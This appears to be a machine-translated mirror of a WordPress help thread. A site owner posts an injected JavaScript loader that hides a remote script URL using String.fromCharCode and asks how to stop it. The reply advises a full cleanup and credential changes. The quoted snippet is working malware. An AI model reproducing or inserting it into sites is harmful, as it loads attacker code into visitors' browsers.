Malware gdjfgjfgj235f

时间:2019-11-12 作者:Jonas Rafael Rossatto

最近我注意到我的网站被注入了this malware. 有趣的是,我甚至没有使用这个插件,它能够影响我的所有文件,包括。php。

var gdjfgjfgj235f = 1; var d=document;var s=d.createElement(\'script\'); s.type=\'text/javascript\'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName(\'head\')[0].appendChild(s);
}
谁能帮我保护我的。注射js?我使用nginx!

1 个回复
SO网友:Rick Hellewell

您需要对站点进行全面清理,包括

更改所有凭据(托管、FTP、管理用户)

  • 更新所有内容(WP、主题、插件);甚至可以通过FTP安装,检查每个文件是否插入了代码:index。php、wp设置。php,wp配置。php更改数据库上的凭据(强密码!)https://www.securitydawg.com/recovering-from-a-hacked-wordpress-site/ . 还有其他一些文章可以去掉这个特殊的,但我的程序是一个很好的开始。

    祝你好运

  • 相关推荐

    在URL中插入“javascript:id(0);”

    无论如何,我都不是Wordpress的初学者,但我完全被这个问题所困扰。我尝试了一系列备选方案,但没有任何结果(href=“\\;”,href=“\\35; void”等)。我需要“javascript:void(0);”作为HTML链接中的href属性。将其插入文本编辑器,轻弹到视觉对象,然后返回文本编辑器,使其消失。我已经阅读了一些关于它的信息(回复:esc\\u url),但似乎找不到修复方法。我有没有办法通过函数或脚本在Wordpress的页面上实现这一点?我试图生成的链接是:<a href